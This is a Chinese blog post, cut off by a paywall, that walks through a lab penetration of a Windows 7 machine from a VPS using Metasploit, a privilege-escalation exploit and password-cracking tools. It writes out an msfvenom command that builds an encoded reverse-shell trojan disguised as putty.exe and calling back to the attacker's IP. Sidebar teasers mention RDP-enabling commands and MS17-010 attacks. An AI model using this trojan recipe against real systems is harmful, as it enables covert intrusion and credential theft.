vps渗透内网win7主机

最新推荐文章于 2024-07-13 16:09:04 发布
最新推荐文章于 2024-07-13 16:09:04 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40334963/article/details/99719670
版权
本文档详细介绍了如何利用VPS渗透进入Win7内网主机的过程,包括环境设定、攻击拓扑图、VPS配置、木马生成、Meterpreter shell获取、提权、密码获取、端口映射、清除痕迹等步骤。涉及到的工具包括Metasploit、CVE-2018-8120提权工具、Saminside等。
摘要由CSDN通过智能技术生成

准备

环境:

win7:192.168.123.233
centos7:45.77.179.138(为做实验临时申请注册公网ip)
攻击:
Metasploit渗透框架
Cve-2018-8120本地提权执行文件
Windows exploit sugger(漏洞利用建议器)
Putty执行文件
Lcx (windows下端口转发工具)
Portmap (linux下端口转发工具)
Saminside (破解系统用户密码)

攻击拓扑图

原图

vps配置攻击环境:

centos7安装metasploit

apt-get install curl,wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
                          //成功安装后请运行下属代码,以使下载的最新版本的msf连接数据库。
adduser msf               //添加msf用户,这里会提示输入新添账号的密码
su msf                    //切换用户为msf
./msfconsole

效果

生成木马并绑定程序(也可以用shellter给程序绑定木马,看个人习惯):

msfvenom -p windows/shell_reverse_tcp LHOST=45.77.179.138 LPORT=8001 -e x86/shikata_ga_nai -x putty.exe  -k -i 5 -f exe -o backdoor.exe
msfvenom -p windows/shell_reverse_tcp 意为使用shell_reverse_tcp攻击载荷
LHOST=45.77.179.138 此步是设置攻击者IP地址
LPORT=8001 此步是设置木马将会主动连接攻击者设定的监听端口
-e x86/shikata_ga_nai 此步意为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码࿰
最低0.47元/天 解锁文章
沙上有印
关注
专栏目录
Centos7安装Msf
yuhongkui的专栏
08-29 887
Centos 7 安装msf框架
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1850
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
渗透测试利器-打造全能VPS
qq_49869351的博客
09-30 4150
云配置渗透测试环境,算是番外番。前几天写了内网渗透一下东西,就顺便把我的环境拿出来给大家参照(水一篇文) 我购买的是腾讯云轻量应用服务器  优点: 便宜,65的价格2g2h4m包一年。 可以独享外网IP,反弹再也不用内网穿透了。 缺点: 自定义镜像很麻烦,本来想装个kali一了百了,但死活各种镜像不匹配,就装了ubuntu自己配置,别说,还真的挺好用。 扩展性不好,要是增加带宽或者磁盘,就很贵且麻烦(其实对我够用了)。 重中之重 我们需要打开防火墙,这里有个大坑,不开的话百思不得其解vnc为什么连不上
暴力干货!2021最新渗透测试知识点大总结(收藏这篇就够了)
MachineGunJoe666
05-13 9913
直接上货! Win2003 wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 Win2003,WinXP REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f Ms..
值班惊魂!曲折“入侵”事件曝光:Windows 机器本地保存RDP密码破解
07-13 680
这个故事不仅是一次关于值班的小插曲,更是对网络安全、系统管理以及应急处理的一次深刻反思。这个故事又给你带来了哪些关于日常工作中的安全隐患和应对措施的启示?希望它能引发你的深入思考,并提醒我们在日常工作中时刻保持警惕,防范潜在的风险。
内网安全---边界主机渗透
gental_z的博客
01-22 1175
一、简单环境搭建 一台VPS,一台边界服务器OWASP,一台内部服务器Ubuntu Server 网络拓扑如图所示: 关于环境的部署,在OWSAP服务器中设置两张网卡,一张设置外部IP,另外一张设置内部IP。 # 具体配置在/etc/network/interface # 这里设置静态IP auto eth0 iface eth0 inet static address 192.168.101.100 netmask 255.255.255.0 gateway 192.168.101.2 auto et
云服务器在CentOS7中安装msf工具
剁椒鱼头没剁椒的博客
03-25 3577
在日常使用中,模拟攻击以及测试的时候都是直接使用本地虚拟机kali中的msf工具,但是在一些测试环境中需要使用到公网,但是目前的所有的云服务商,并不会提供kali镜像,那么当使用到msf工具的时候就需要自行安装了。网上的很多关于centos安装msf工具的教程,多多少少都存在一些问题,所以,这里就总结一篇关于centos7中安装msf工具的文章。一台云服务器centos 7.X版本Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2190
红日靶场渗透教程
内网渗透技术
帅醉了的博客
04-30 2371
内网穿透技术原理netshiptablesregerogEarthwormicmptunneldns2tcpc端口复用 原理 内网穿透技术原理:通过拿到shell的主机,要去访问内网的其他主机时候,通过监听本地端口,靶机转发目标内网主机到本地监听端口上。另一种是访问本地端口(内网主机),通过映射的方式。如下图,kali通过vpn开启的8081去访问win10的3306服务。vpn先是开启监听,通过...
红队内网攻防渗透内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 290
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
linux安装 msf,centos安装msf
weixin_39876650的博客
05-27 888
centos安装msf的一个笔记以前都是使用kali的msf,没有自己安装过,现在我使用centos系统,了解一些安装过程。百度了一下安装的教程,跟着操作了一下。有一些坑。第一步、下载包wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run给予这个包执行的权限:chm...
超牛叉的外网渗透详细教程
cheyunhua的博客
03-22 6264
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器。 但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。 搜索结果的话, 首先,虚拟机里的kali不能渗透到外网的原因是它没有外网IP。 所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。 本质其实都一样。但是亲测后者比较有用。 可!是! 第二个方法有一个特点,就是很烦。 买好服务器之后再下载frp,服务器
记一次简单的内网渗透
来到了学渣的博客
06-18 1464
起因 本人这次实验过程 回公司后连wifi已经相当于进入内网环境→对目标进行端口扫描→存在高危端口139、445(永恒之蓝)、3389(19年RDP)→poc验证存在漏洞并用msf打exp,只成功了一次→对成功的一次把握住机会对222主机添加了账号密码并提升为管理员权限→因为发烧去不了公司,罗哥给了我跳板机→利用跳板机代理流量→访问222机子,下载mimikatz抓取密码→登录到222机子的域身份→发现是域管→用哈希传递、psexec横向连接到域控→清理痕迹。 和目标机同一局域网 Nmap对内网ip 19
内网渗透-红队内网渗透工具(Viper)
lza20001103的博客
05-22 8711
红队内网渗透工具(Viper)
虚拟主机的提权两个小技巧
https://www.cnblogs.com/zpchcbd/
06-16 847
从别人那里看到了 对虚拟主机的提权很有帮助 就收藏了 0x01:是否大家会想到调用远程路径去执行CMD,比如(\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点: 1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活...
利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)
热门推荐
大方子
08-24 1万+
前言 其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。 准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!!...
内网渗透之IPC,远程执行
weixin_30699741的博客
01-23 766
开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$ 试环境:主机(windows XP sp3)与windows XP sp2虚拟机)通...
虚拟主机vps云服务器的区别
最新发布
07-14
虚拟主机(Virtual Host)和VPS(Virtual Private Server)云服务器在功能和资源分配上有显著区别: 1. **虚拟主机**:通常是指托管在一台物理服务器上的多个共享资源的服务。每个域名或站点都有一个独立的IP地址,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值